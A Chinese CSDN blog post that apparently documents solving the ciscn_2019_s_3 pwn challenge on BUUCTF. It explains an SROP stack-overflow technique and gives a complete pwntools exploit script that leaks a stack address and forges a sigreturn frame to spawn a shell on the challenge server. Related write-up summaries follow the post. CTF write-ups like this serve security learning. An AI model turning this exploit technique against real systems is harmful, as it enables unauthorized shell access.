ciscn_2019_s_3

最新推荐文章于 2023-06-07 15:51:39 发布
最新推荐文章于 2023-06-07 15:51:39 发布
阅读量1.1k 收藏
点赞数 1
文章标签: pwn python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52231248/article/details/121361488
版权

ciscn_2019_s_3

Checksec:

Ida:

看到代码量很少,同时出现了syscall基本上这题就是srop了。

接下来确定溢出,offest=0x10

srop :伪造 sigreturn frame 去 伪造 execve("/bin/sh",0,0) 来 getshell

我们已经确定了offest还需要完成

1,需要知道栈的地址(比如需要知道自己构造的字符串`/bin/sh`的地址);

2,需要知道`syscall`指令在内存中的地址;

3,需要知道`sigreturn`系统调用的内存地址。

确定栈偏移:

Offest=0x118

Syscall:0x400517

Sigreturn:需要我们找到sigreturn内存地址或者通过将rax赋值为15

完成了所有条件我们构造exp:

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
r = remote("node4.buuoj.cn",29168)
sigreturn = 0x4004DA
read_write = 0x4004F1
system_call = 0x400517
payload =flat( '/bin/sh\x00') +flat( 'a'*0x8) + p64(read_write) 
r.send(payload)
r.recv(32)
sh_addr = u64(r.recv(8)) - 0x118
r.recv(8)
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = sh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = system_call
payload =flat( 'a'*0x10)+p64(sigreturn)+p64(system_call)+flat(frame)
r.send(payload)
r.interactive()

Flag:

_white_233
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pwnciscn_2019_s_3
Nothing
12-14 4516
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1349
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
ciscn_2021_game
06-23
2021年国赛的pwn题,虚拟机类型的题目,分析起来比较有难度。
ciscn_2021_silverwolf.zip
05-18
2021第十四届全国大学生信息安全竞赛pwn题。
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
ciscn_2021_lonelywolf.zip
05-17
【标题解析】:“ciscn_2021_lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛...
csicn_2019_s_3
Morphy_Amo的博客
03-06 322
万能gadget、SROP
2019ciscn_s_3
Hyrink的博客
06-07 481
ciscn_s_3的两种解法:SROP & ret2csu详解
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 726
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
pwn ciscn_2019_s_3
beaster1的博客
03-23 198
pwn ciscn_2019_s_3(srop) checksec一下发现是64位文件 并只开了NX保护 打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10) 发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax 看到最后有点奇怪开始时pop rbp mov rbp,rsp 程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了 所以r
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 481
ciscn_2019_s_3
[BUUCTF-pwn]——ciscn_2019_s_3
Y_peak的博客
02-13 352
[BUUCTF-pwn]——ciscn_2019_s_3 题目地址:https://buuoj.cn/challenges#ciscn_2019_s_3 peak 小知识 写这道题之前, 大家首先要了解, 想要获得一个shell, 除了system("/bin/sh") 以外, 还有一种更好的方法, 就是系统调用中的 execve("/bin/sh", NULL, NULL)获得shell。我们可以在 Linxu系统调用号表 中找到对应的系统调用号,进行调用, 其中32位程序系统调用号用 eax 储存
【BUUCTF - PWNciscn_2019_s_3
古月浪子的博客
04-17 746
checksec一下,栈溢出 IDA打开看看,main函数内只有一个call vuln 注意到vuln函数末尾并没有使用leave指令,即直接把之前push的rbp当作return address 我们要ROP的话offset只需要0x10 程序里还给了一些gadget,注意到当rax=0x3b时syscall为execve,只需要让rdi="/bin/sh"、rsi=0、rdx=0即可ge...
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 520
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 362
64位,开启了NX保护 main函数调用了vuln
ciscn_2019_c_1
最新发布
09-12
根据您提供的引用内容和,题目"ciscn_2019_c_1"是一个涉及到fastbin堆漏洞利用的题目。fastbin是一个堆区的数据结构,用于存储小于等于64字节的空闲块。这个题目的漏洞利用难度不大,适合初学者练习。 根据的代码分析,题目的主函数是"main"函数。它首先打印了一些欢迎信息,在一个无限循环中等待用户输入指令。根据用户输入的指令来执行相应的功能。当用户输入为1时,调用"encrypt"函数进行加密操作。当用户输入为2时,提示用户自己进行操作。当用户输入为3时,退出程序。其他输入会提示输入错误。 根据的代码分析,"encrypt"函数用于对用户输入的明文进行加密操作。在函数内部,首先定义了一个字符数组"s"用于存储用户输入的明文。然后使用gets函数获取用户输入,存在栈溢出的漏洞。接下来,对用户输入的明文进行加密操作。根据输入的字符的ASCII值的范围,使用不同的异或值进行加密。最后将加密后的密文打印出来。 综上所述,题目"ciscn_2019_c_1"是一个涉及fastbin堆漏洞利用的题目。在主函数中,根据用户输入的指令来执行相应的功能,包括调用"encrypt"函数进行加密操作。"encrypt"函数中存在栈溢出漏洞,并对用户输入的明文进行加密操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值